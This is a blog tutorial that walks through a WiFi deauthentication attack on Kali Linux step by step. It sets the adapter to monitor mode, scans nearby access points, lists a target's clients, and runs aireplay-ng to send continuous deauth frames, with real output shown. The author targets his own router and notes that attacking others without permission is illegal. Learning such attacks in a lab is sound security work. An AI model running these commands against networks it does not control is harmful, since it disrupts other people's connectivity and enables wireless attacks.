Deauthentication Attack using Kali Linux

-

 By typing ifconfig and the enter key on your terminal you get the following output :

eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
inet 10.0.2.15  netmask 255.255.255.0  broadcast 10.0.2.255
inet6 fe80::a00:27ff:fe59:1b51  prefixlen 64  scopeid 0x20<link>
ether 08:00:27:59:1b:51  txqueuelen 1000  (Ethernet)
RX packets 5  bytes 1360 (1.3 KiB)
RX errors 0  dropped 0  overruns 0  frame 0
TX packets 69  bytes 5690 (5.5 KiB)
TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
inet 127.0.0.1  netmask 255.0.0.0
inet6 ::1  prefixlen 128  scopeid 0x10<host>
loop  txqueuelen 1000  (Local Loopback)
RX packets 20  bytes 1116 (1.0 KiB)
RX errors 0  dropped 0  overruns 0  frame 0
TX packets 20  bytes 1116 (1.0 KiB)
TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

wlan0: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500
ether fa:30:3e:ca:dd:85  txqueuelen 1000  (Ethernet)
RX packets 0  bytes 0 (0.0 B)
RX errors 0  dropped 0  overruns 0  frame 0
TX packets 0  bytes 0 (0.0 B)
TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

At the eth0 section in my ifconfig output, you see that I have inet 10.0.2.15, this is because I am running Kali Linux on a Virtual Machine and it is connected on a nat network. Don't worry about it, you do not even have to care at the moment.

All you have to care about is the wlan0 section that is your wireless adapter and as you can see mine is not even connected to a network. If it was it would be displaying an IP in the range of 192.168.x.x (Just for answering future questions).

The next command is iwconfig. Type it and execute it on your terminal and boom:

lo        no wireless extensions.

eth0      no wireless extensions.

wlan0     IEEE 802.11  ESSID:off/any  
Mode:Managed  Access Point: Not-Associated   Tx-Power=20 dBm   
Retry short limit:7   RTS thr:off   Fragment thr:off
Encryption key:off
Power Management:off

From this output, we understand that our wireless card is in Managed Mode and we want it to be in Monitor Mode. So let's do that.

Step 2 - Setting wireless adapter on Monitor mode with airmon-ng

By running the airmon-ng start wlan0 (or whatever your adapter is called, it could be wlan1 or wlan2) you are setting your adapter to monitor mode! Check out the output :

root@kali:~# airmon-ng start wlan0

Found 3 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to run 'airmon-ng check kill'

PID Name
448 NetworkManager
525 dhclient
654 wpa_supplicant

PHY	Interface	Driver		Chipset

phy0	wlan0		ath9k_htc	Atheros Communications, Inc. TP-Link TL-WN322G v3 / TL-WN422G v2 802.11g [Atheros AR9271]

(mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
(mac80211 station mode vif disabled for [phy0]wlan0)

root@kali:~# iwconfig
lo        no wireless extensions.

eth0      no wireless extensions.

wlan0mon  IEEE 802.11  Mode:Monitor  Frequency:2.457 GHz  Tx-Power=20 dBm   
Retry short limit:7   RTS thr:off   Fragment thr:off
Power Management:off

See the above iwconfig result. Mode:Monitor and the name is wlan0mon! You are ready to go.

Step 3 - Searching for victims with airodump-ng

Execute the command airodump-ng wlan0mon on your terminal and start choosing targets.

Command output:

CH 12 ][ Elapsed: 6 s ][ 2020-09-02 15:41                                         

BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

**:**:**:**:**:**  -85        2        1    0   6  130  WPA2 CCMP   PSK  ******911                 
**:**:**:**:**:**  -79        4        0    0  11   65  WPA2 CCMP   PSK  ******etwork                
50:C7:BF:DC:4C:E8  -45       18        0    0  11  270  WPA2 CCMP   PSK  TP-LINK_AP_4CE8                
**:**:**:**:**:**  -74        5        0    0   1  270  WPA2 CCMP   PSK  ******D                 
**:**:**:**:**:**  -75        5        0    0   1  270  OPN              ******Fon                   
**:**:**:**:**:**  -79        6        0    0   6   65  WPA  CCMP   PSK  Win******9A84                
**:**:**:**:**:**  -82        2        2    0   2  270  WPA2 CCMP   PSK  ******4hu1                     
**:**:**:**:**:**  -81        4        8    0  13  135  WPA  CCMP   PSK  mp******i                      
**:**:**:**:**:**  -91        2        0    0   1  270  OPN              OTE******n                   
**:**:**:**:**:**  -92        3        1    0   1  270  WPA2 CCMP   PSK  Sp******e Sky

The combination of BSSID and ESSID can help hackers find locations. 😁 Yeap, that's a thing.
The command will keep running and monitoring near Access Point behavior but as soon as we find our target on the list we can just hit ctrl+c to stop the monitoring process.

You will get a bunch of different access points with a lot of info you don't understand! Let's break them down.

  • BSSID | MAC address of the access point. In the Client section, a BSSID of “(not associated)” means that the client is not associated with any AP. In this unassociated state, it is searching for an AP to connect with.
  • PWR | Signal level reported by the card. Its signification depends on the driver, but as the signal gets higher you get closer to the AP or the station. If the BSSID PWR is -1, then the driver doesn't support signal level reporting. If the PWR is -1 for a limited number of stations then this is for a packet which came from the AP to the client but the client transmissions are out of range for your card. Meaning you are hearing only 1/2 of the communication. If all clients have PWR as -1 then the driver doesn't support signal level reporting.
  • Beacons | Number of announcements packets sent by the AP. Each access point sends about ten beacons per second at the lowest rate (1M), so they can usually be picked up from very far.
  • # Data | Number of captured data packets (if WEP, unique IV count), including data broadcast packets.
  • #/s | Number of data packets per second measure over the last 10 seconds.
  • CH | Channel number (taken from beacon packets).
    Note: sometimes packets from other channels are captured even if airodump-ng is not hopping, because of radio interference.
  • MB | Maximum speed supported by the AP. If MB = 11, it's 802.11b, if MB = 22 it's 802.11b+ and higher rates are 802.11g. The dot (after 54 above) indicates short preamble is supported. Displays “e” following the MB speed value if the network has QoS enabled.
  • ENC | Encryption algorithm in use. OPN = no encryption,“WEP?” = WEP or higher (not enough data to choose between WEP and WPA/WPA2), WEP (without the question mark) indicates static or dynamic WEP, and WPA or WPA2 if TKIP or CCMP is present.
  • CIPHER | The cipher detected. One of CCMP, WRAP, TKIP, WEP, WEP40, or WEP104. Not mandatory, but TKIP is typically used with WPA and CCMP is typically used with WPA2. WEP40 is displayed when the key index is greater then 0. The standard states that the index can be 0-3 for 40bit and should be 0 for 104 bit.
  • AUTH | The authentication protocol used. One of MGT (WPA/WPA2 using a separate authentication server), SKA (shared key for WEP), PSK (pre-shared key for WPA/WPA2), or OPN (open for WEP).
  • ESSID | Shows the wireless network name. The so-called “SSID”, which can be empty if SSID hiding is activated. In this case, airodump-ng will try to recover the SSID from probe responses and association requests.

I will be targeting my own AP TP-LINK_AP_4CE8! You should understand that doing this to other APs is illegal. Unless you have the permission of course.

Step 4 - Specific Targeting for better information gathering

Now that we know all that we need to know about our target we have to find any devices connected to the network, to do that we run the following command.

The commands structure is airodump-ng -d "target's BSSID" -c "target's channel number" "wireless adapter monitor mode name"
In our case the full command is:

airodump-ng -d 50:C7:BF:DC:4C:E8 -c 11 wlan0mon

Now we are monitoring SPECIFICALLY our target and not all nearby access points. Also, we can see that there are two devices currently inside the network, one of which is my phone!

CH 11 ][ Elapsed: 1 min ][ 2020-09-02 15:59 ]                        

BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

50:C7:BF:DC:4C:E8  -22  91      610      163    4  11  270  WPA2 CCMP   PSK  TP-LINK_AP_4CE8            

BSSID              STATION            PWR   Rate    Lost    Frames  Probe                               

50:C7:BF:DC:4C:E8  AC:3C:0B:36:BD:5B  -32    0e-24      0       12                                       
50:C7:BF:DC:4C:E8  E0:B5:2D:EA:18:A7  -58    1e-24      6      122

Step 5 - Deauthenticating device from network //Kicking

The final command is:

aireplay-ng -0 0 -a 50:C7:BF:DC:4C:E8 -c E0:B5:2D:EA:18:A7 wlan0mon

Command instructions:

  • -0 means deauthentication.
  • 0 is the number of deauths to send, 0 means send them continuously, you can send 10 if you want the target to disconnect and reconnect.
  • -a 50:C7:BF:DC:4C:E8 is the MAC address of the access point we are targeting.
  • -c E0:B5:2D:EA:18:A7 is the MAC address of the client to deauthenticate; if this is omitted then all clients are deauthenticated.
  • wlan0mon is the interface name.

The command continuous output:

16:14:41  Waiting for beacon frame (BSSID: 50:C7:BF:DC:4C:E8) on channel 11
16:14:42  Sending 64 directed DeAuth (code 7). STMAC: [E0:B5:2D:EA:18:A7] [99|67 ACKs]
16:14:43  Sending 64 directed DeAuth (code 7). STMAC: [E0:B5:2D:EA:18:A7] [61|59 ACKs]
16:14:43  Sending 64 directed DeAuth (code 7). STMAC: [E0:B5:2D:EA:18:A7] [25|48 ACKs]
16:14:44  Sending 64 directed DeAuth (code 7). STMAC: [E0:B5:2D:EA:18:A7] [ 0|72 ACKs]
16:14:45  Sending 64 directed DeAuth (code 7). STMAC: [E0:B5:2D:EA:18:A7] [ 0|57 ACKs]
16:14:45  Sending 64 directed DeAuth (code 7). STMAC: [E0:B5:2D:EA:18:A7] [ 0|65 ACKs]
16:14:45  Sending 64 directed DeAuth (code 7). STMAC: [E0:B5:2D:EA:^C:A7] [ 0|10 ACKs]
...
...
[until we hit ctrl+c to stop it sending packets]

Comments

Post a Comment

Popular posts from this blog

Moodle Backup and Restore in Docker

-
Backup moodle & mariadb images to a folder First, Run the docker commit container command this is just for copying the container image (where  moodle-moodle-1 &   moodle-mariadb-1   is the name of the constainer try: "docker ps" to look for the name of that container you want to commit ) : # docker commit -p moodle-moodle-1 backup-moodle-moodle-1 # docker commit -p moodle-mariadb-1 backup-moodle-mariadb-1 Alternatively, we can save it as a tar file in any directory and move it freely to any desired docker host system for a deployment: # docker save -o ~/backup-moodle-moodle-1.tar backup-moodle-moodle-1 # docker save -o ~/backup-moodle-mariadb-1.tar backup-moodle-mariadb-1 Backing up Docker volumes to a folder # docker volume ls Secondly , Backup the data in the docker volumes into a compressed file archive and save it to the local directory /tmp or any directory you want (just change only the /tmp to any directory you want) the  mariadb_data, moodle_data, mo...
Read more

Custom Domain to GitHub Pages (Hostinger Edition)

-
Image
Go to your Hostinger domain DNS settings The first step is to go to your Hostinger domain DNS settings. You can do this by visiting  https://hpanel.hostinger.com/domain/yourdomain.com/dns . Create two new CNAME records We need to create two new CNAME records. The first record will point  www.yourdomain.com  to  <your-github-username>.github.io . The second record will point  yourdomain.com  to  <your-github-username>.github.io . Enter Type - CNAME, Name - www, Points to - .github.io, TTL you can leave as default. This is for when someone types  www.yourdomain.com . Then we need the same for APEX domains or when someone just types  yourdomain.com , for this enter another CNAME with Name - @ and Points to .github.io. This will automatically set an ALIAS type and add it to the DNS records.  Add the GitHub Pages IP addresses Finally, we need to add the IP addresses and the txt value(this is obtain in the github/gitlab itself) for...
Read more

Resizing partition in AWS

-
  First lsblk If Using a Standard Partition (No LVM) Resize the partition: sudo growpart /dev/nvme0n1 1 Resize the filesystem: sudo resize2fs /dev/nvme0n1p1 # For ext4 sudo xfs_growfs /dev/nvme0n1p1 # For XFS Step 4: Verify the New Storage df -h You should now see the increased disk space. 🚀
Read more